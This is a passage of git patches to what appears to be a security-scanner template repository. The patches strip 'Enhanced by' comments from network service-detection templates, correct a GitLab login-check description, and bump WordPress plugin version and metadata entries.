a/network/detection/iplanet-imap-detect.yaml +++ b/network/detection/iplanet-imap-detect.yaml @@ -33,4 +33,4 @@ tcp: regex: - "iPlanet Messaging Server ([0-9.]+)" -# Enhanced by md on 2023/02/06 + diff --git a/network/detection/java-rmi-detect.yaml b/network/detection/java-rmi-detect.yaml index 55394f3eee..75aa4d4f66 100644 --- a/network/detection/java-rmi-detect.yaml +++ b/network/detection/java-rmi-detect.yaml @@ -28,4 +28,4 @@ tcp: regex: - "^N\\x00\\x0e(\\d{1,3}\\.){3}\\d{1,3}\\x00\\x00" -# Enhanced by md on 2023/02/06 + diff --git a/network/detection/mikrotik-routeros-api.yaml b/network/detection/mikrotik-routeros-api.yaml index 4ee9eb5e7e..b59238967b 100644 --- a/network/detection/mikrotik-routeros-api.yaml +++ b/network/detection/mikrotik-routeros-api.yaml @@ -31,4 +31,4 @@ tcp: words: - "0621666174616c0d6e6f74206c6f6767656420696e00" -# Enhanced by md on 2023/02/06 + diff --git a/network/detection/mongodb-detect.yaml b/network/detection/mongodb-detect.yaml index 2157af15b9..4c96c88d3e 100644 --- a/network/detection/mongodb-detect.yaml +++ b/network/detection/mongodb-detect.yaml @@ -32,4 +32,4 @@ tcp: - "logicalSessionTimeout" - "localTime" -# Enhanced by md on 2023/02/06 + diff --git a/network/detection/mysql-detect.yaml b/network/detection/mysql-detect.yaml index 58baee275b..af1e3f5ba2 100644 --- a/network/detection/mysql-detect.yaml +++ b/network/detection/mysql-detect.yaml @@ -31,4 +31,4 @@ tcp: - "mysql" case-insensitive: true -# Enhanced by md on 2023/03/15 + diff --git a/network/detection/openssh-detect.yaml b/network/detection/openssh-detect.yaml index 63dc62ca17..5d1d7569a1 100644 --- a/network/detection/openssh-detect.yaml +++ b/network/detection/openssh-detect.yaml @@ -35,4 +35,4 @@ tcp: regex: - '(?i)SSH-(.*)-OpenSSH_[^\r]+' -# Enhanced by md on 2023/02/06 + diff --git a/network/detection/pgsql-detect.yaml b/network/detection/pgsql-detect.yaml index 8cff2b1980..5402f3b5b3 100644 --- a/network/detection/pgsql-detect.yaml +++ b/network/detection/pgsql-detect.yaml @@ -43,4 +43,4 @@ tcp: - "database \"nuclei\"" # The db nuclei (sent in request) doesn't exist" condition: or -# Enhanced by md on 2023/03/15 + diff --git a/network/detection/pop3-detect.yaml b/network/detection/pop3-detect.yaml index 33e545a1de..96624c892b 100644 --- a/network/detection/pop3-detect.yaml +++ b/network/detection/pop3-detect.yaml @@ -33,4 +33,4 @@ tcp: - "POP3" condition: or -# Enhanced by md on 2023/02/06 + diff --git a/network/detection/rdp-detect.yaml b/network/detection/rdp-detect.yaml index 93eca9e807..87df806b2c 100644 --- a/network/detection/rdp-detect.yaml +++ b/network/detection/rdp-detect.yaml @@ -86,4 +86,4 @@ tcp: words: - "030000130ed00000123400021f080008000000" -# Enhanced by md on 2023/02/06 + diff --git a/network/detection/redis-detect.yaml b/network/detection/redis-detect.yaml index 0107c00189..d2dba409be 100644 --- a/network/detection/redis-detect.yaml +++ b/network/detection/redis-detect.yaml @@ -33,4 +33,4 @@ tcp: - "NOAUTH Authentication" condition: or -# Enhanced by md on 2023/02/06 + diff --git a/network/detection/rpcbind-portmapper-detect.yaml b/network/detection/rpcbind-portmapper-detect.yaml index 24c4f7c24b..58474b2540 100644 --- a/network/detection/rpcbind-portmapper-detect.yaml +++ b/network/detection/rpcbind-portmapper-detect.yaml @@ -30,4 +30,4 @@ tcp: words: - "/run/rpcbind.sock" -# Enhanced by md on 2023/02/06 + diff --git a/network/detection/rsyncd-service-detect.yaml b/network/detection/rsyncd-service-detect.yaml index 8697ea4051..43c75bbecd 100644 --- a/network/detection/rsyncd-service-detect.yaml +++ b/network/detection/rsyncd-service-detect.yaml @@ -36,4 +36,4 @@ tcp: regex: - 'RSYNCD: \d\d.\d' -# Enhanced by md on 2023/02/06 + diff --git a/network/detection/rtsp-detect.yaml b/network/detection/rtsp-detect.yaml index 39e5a3022b..e67d772618 100644 --- a/network/detection/rtsp-detect.yaml +++ b/network/detection/rtsp-detect.yaml @@ -33,4 +33,4 @@ tcp: words: - "RTSP/1.0" -# Enhanced by md on 2023/03/29 + diff --git a/network/detection/samba-detect.yaml b/network/detection/samba-detect.yaml index 9cd4c4934c..c2b2bc9a05 100644 --- a/network/detection/samba-detect.yaml +++ b/network/detection/samba-detect.yaml @@ -26,4 +26,4 @@ tcp: - type: word words: - "SMBr" -# Enhanced by mp on 2022/02/09 + diff --git a/network/detection/vnc-service-detect.yaml b/network/detection/vnc-service-detect.yaml index dcfd34068b..09202704d9 100644 --- a/network/detection/vnc-service-detect.yaml +++ b/network/detection/vnc-service-detect.yaml @@ -29,4 +29,4 @@ tcp: regex: - "RFB ([0-9.]+)" -# Enhanced by mp on 2022/04/20 + diff --git a/network/enumeration/mongodb-info-enum.yaml b/network/enumeration/mongodb-info-enum.yaml index 19275674e6..ce84902927 100644 --- a/network/enumeration/mongodb-info-enum.yaml +++ b/network/enumeration/mongodb-info-enum.yaml @@ -41,4 +41,4 @@ tcp: regex: - "([A-Za-z:0-9.]+)" -# Enhanced by md on 2023/03/15 + diff --git a/network/exposed-adb.yaml b/network/exposed-adb.yaml index 3c4df9af89..b7750e5bd9 100644 --- a/network/exposed-adb.yaml +++ b/network/exposed-adb.yaml @@ -32,4 +32,4 @@ tcp: - "product" condition: and -# Enhanced by mp on 2022/03/21 + diff --git a/network/exposed-redis.yaml b/network/exposed-redis.yaml index c864126333..00c551e800 100644 --- a/network/exposed-redis.yaml +++ b/network/exposed-redis.yaml @@ -32,5 +32,5 @@ tcp: words: - "redis_mode:sentinel" -# Enhanced by mp on 2022/07/20 -# Enhanced by vibrio on 2023/05/11 + + diff --git a/network/exposed-zookeeper.yaml b/network/exposed-zookeeper.yaml index 62964e5a4b..99f36419b5 100644 --- a/network/exposed-zookeeper.yaml +++ b/network/exposed-zookeeper.yaml @@ -25,4 +25,4 @@ tcp: words: - "zookeeper.version" -# Enhanced by mp on 2022/07/21 + diff --git a/network/ftp-weak-credentials.yaml b/network/ftp-weak-credentials.yaml index 23cf682d74..955bb109e4 100644 --- a/network/ftp-weak-credentials.yaml +++ b/network/ftp-weak-credentials.yaml @@ -42,4 +42,4 @@ tcp: words: - "230 Login successful" -# Enhanced by mp on 2022/05/23 + diff --git a/network/mongodb-unauth.yaml b/network/mongodb-unauth.yaml index 47978d9f87..0e28447f30 100644 --- a/network/mongodb-unauth.yaml +++ b/network/mongodb-unauth.yaml @@ -28,4 +28,4 @@ tcp: words: - "totalLinesWritten" -# Enhanced by mp on 2022/07/20 + diff --git a/network/mysql-native-password.yaml b/network/mysql-native-password.yaml index 5e4ecacc39..7fd13d47db 100644 --- a/network/mysql-native-password.yaml +++ b/network/mysql-native-password.yaml @@ -25,4 +25,4 @@ tcp: words: - "mysql_native_password" -# Enhanced by md on 2022/10/04 + diff --git a/network/sap-router-info-leak.yaml b/network/sap-router-info-leak.yaml index 28a29bfb7a..2c68a749d2 100644 --- a/network/sap-router-info-leak.yaml +++ b/network/sap-router-info-leak.yaml @@ -29,4 +29,4 @@ tcp: - "Working directory" - "SAProuter Connection Table" -# Enhanced by mp on 2022/03/21 + diff --git a/network/tidb-native-password.yaml b/network/tidb-native-password.yaml index 2539c6e83c..6764a1810e 100644 --- a/network/tidb-native-password.yaml +++ b/network/tidb-native-password.yaml @@ -25,4 +25,4 @@ tcp: - "TiDB" condition: and -# Enhanced by md on 2022/10/04 + diff --git a/network/tidb-unauth.yaml b/network/tidb-unauth.yaml index cddeaacf9f..99e8dda44d 100644 --- a/network/tidb-unauth.yaml +++ b/network/tidb-unauth.yaml @@ -29,4 +29,4 @@ tcp: # 07: length, 02: sequence number, 00: success - "0700000200000002000000" -# Enhanced by mp on 2022/07/20 + diff --git a/network/vsftpd-backdoor.yaml b/network/vsftpd-backdoor.yaml index 869615112a..5dc554b060 100644 --- a/network/vsftpd-backdoor.yaml +++ b/network/vsftpd-backdoor.yaml @@ -29,4 +29,4 @@ tcp: words: - "vsFTPd 2.3.4" -# Enhanced by mp on 2022/05/23 + diff --git a/network/vulnerabilities/clockwatch-enterprise-rce.yaml b/network/vulnerabilities/clockwatch-enterprise-rce.yaml index fb741e8dd8..4a91935ccd 100644 --- a/network/vulnerabilities/clockwatch-enterprise-rce.yaml +++ b/network/vulnerabilities/clockwatch-enterprise-rce.yaml @@ -36,4 +36,4 @@ tcp: words: - "OK-C" -# Enhanced by mp on 2022/05/27 + From e2f76b5d5340a8c3d86f772919e02fab055563ae Mon Sep 17 00:00:00 2001 From: Brendan O'Leary Date: Wed, 5 Jul 2023 16:50:54 -0400 Subject: [PATCH 391/609] Update gitlab-login-check-self-hosted.yaml Change Grafana to GitLab in GitLab self-hosted template --- .../self-hosted/gitlab-login-check-self-hosted.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml b/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml index d51c10a5d8..7dd9808c9f 100644 --- a/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml +++ b/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml @@ -3,7 +3,7 @@ info: name: Gitlab Login Check Self Hosted author: parthmalhotra,pdresearch severity: critical - description: Checks for a valid login on self hosted Grafana instance. + description: Checks for a valid login on self hosted GitLab instance. reference: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: From 51458246eec6ed0b0aaa824d6941b1b06d793b07 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 6 Jul 2023 04:02:12 +0000 Subject: [PATCH 392/609] Auto WordPress Plugins Update [Thu Jul 6 04:02:12 UTC 2023] :robot: --- helpers/wordpress/plugins/code-snippets.txt | 2 +- helpers/wordpress/plugins/facebook-for-woocommerce.txt | 2 +- helpers/wordpress/plugins/forminator.txt | 2 +- helpers/wordpress/plugins/jetpack.txt | 2 +- helpers/wordpress/plugins/ml-slider.txt | 2 +- helpers/wordpress/plugins/nextgen-gallery.txt | 2 +- helpers/wordpress/plugins/pixelyoursite.txt | 2 +- helpers/wordpress/plugins/tablepress.txt | 2 +- helpers/wordpress/plugins/wp-smushit.txt | 2 +- helpers/wordpress/plugins/wpcf7-redirect.txt | 2 +- helpers/wordpress/plugins/wpvivid-backuprestore.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/astra-widgets.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cloudflare.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-and-footer-scripts.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - http/technologies/wordpress/plugins/loginpress.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - http/technologies/wordpress/plugins/photo-gallery.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-builder.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/use-any-font.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 211 files changed, 11 insertions(+), 211 deletions(-) diff --git a/helpers/wordpress/plugins/code-snippets.txt b/helpers/wordpress/plugins/code-snippets.txt index 8cf6caf561..a423d4217b 100644 --- a/helpers/wordpress/plugins/code-snippets.txt +++ b/helpers/wordpress/plugins/code-snippets.txt @@ -1 +1 @@ -3.4.1 \ No newline at end of file +3.4.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/facebook-for-woocommerce.txt b/helpers/wordpress/plugins/facebook-for-woocommerce.txt index 38be3a7bcd..8479333e1f 100644 --- a/helpers/wordpress/plugins/facebook-for-woocommerce.txt +++ b/helpers/wordpress/plugins/facebook-for-woocommerce.txt @@ -1 +1 @@ -3.0.26 \ No newline at end of file +3.0.27 \ No newline at end of file diff --git a/helpers/wordpress/plugins/forminator.txt b/helpers/wordpress/plugins/forminator.txt index 7ad7fa0185..06424fbc0c 100644 --- a/helpers/wordpress/plugins/forminator.txt +++ b/helpers/wordpress/plugins/forminator.txt @@ -1 +1 @@ -1.24.4 \ No newline at end of file +1.24.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/jetpack.txt b/helpers/wordpress/plugins/jetpack.txt index e597143d87..627b54f351 100644 --- a/helpers/wordpress/plugins/jetpack.txt +++ b/helpers/wordpress/plugins/jetpack.txt @@ -1 +1 @@ -12.2.1 \ No newline at end of file +12.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ml-slider.txt b/helpers/wordpress/plugins/ml-slider.txt index 40fc72677c..42d9670e6e 100644 --- a/helpers/wordpress/plugins/ml-slider.txt +++ b/helpers/wordpress/plugins/ml-slider.txt @@ -1 +1 @@ -3.32.0 \ No newline at end of file +3.33.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/nextgen-gallery.txt b/helpers/wordpress/plugins/nextgen-gallery.txt index cad5350a41..85ec80b2a9 100644 --- a/helpers/wordpress/plugins/nextgen-gallery.txt +++ b/helpers/wordpress/plugins/nextgen-gallery.txt @@ -1 +1 @@ -3.36 \ No newline at end of file +3.37 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pixelyoursite.txt b/helpers/wordpress/plugins/pixelyoursite.txt index 8824b7e7f5..b4cf44c8dc 100644 --- a/helpers/wordpress/plugins/pixelyoursite.txt +++ b/helpers/wordpress/plugins/pixelyoursite.txt @@ -1 +1 @@ -9.3.9 \ No newline at end of file +9.4.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/tablepress.txt b/helpers/wordpress/plugins/tablepress.txt index c346e7a049..c5864dcf3e 100644 --- a/helpers/wordpress/plugins/tablepress.txt +++ b/helpers/wordpress/plugins/tablepress.txt @@ -1 +1 @@ -2.1.4 \ No newline at end of file +2.1.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-smushit.txt b/helpers/wordpress/plugins/wp-smushit.txt index 7918c7abbb..97c684195c 100644 --- a/helpers/wordpress/plugins/wp-smushit.txt +++ b/helpers/wordpress/plugins/wp-smushit.txt @@ -1 +1 @@ -3.13.1 \ No newline at end of file +3.13.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpcf7-redirect.txt b/helpers/wordpress/plugins/wpcf7-redirect.txt index 6533b66871..f3ac133c54 100644 --- a/helpers/wordpress/plugins/wpcf7-redirect.txt +++ b/helpers/wordpress/plugins/wpcf7-redirect.txt @@ -1 +1 @@ -2.8.0 \ No newline at end of file +2.9.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpvivid-backuprestore.txt b/helpers/wordpress/plugins/wpvivid-backuprestore.txt index 668cadeb4e..e9cd0519b8 100644 --- a/helpers/wordpress/plugins/wpvivid-backuprestore.txt +++ b/helpers/wordpress/plugins/wpvivid-backuprestore.txt @@ -1 +1 @@ -0.9.87 \ No newline at end of file +0.9.88 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index ebb5ba1042..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index fddfbf3118..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 7a6e8a76ec..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 940c0e614c..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 06cfd4950b..97f1d8c18f 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 90aa5881fd..10f104f2c7 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: - max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 1bf337da6c..8addc28ded 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ 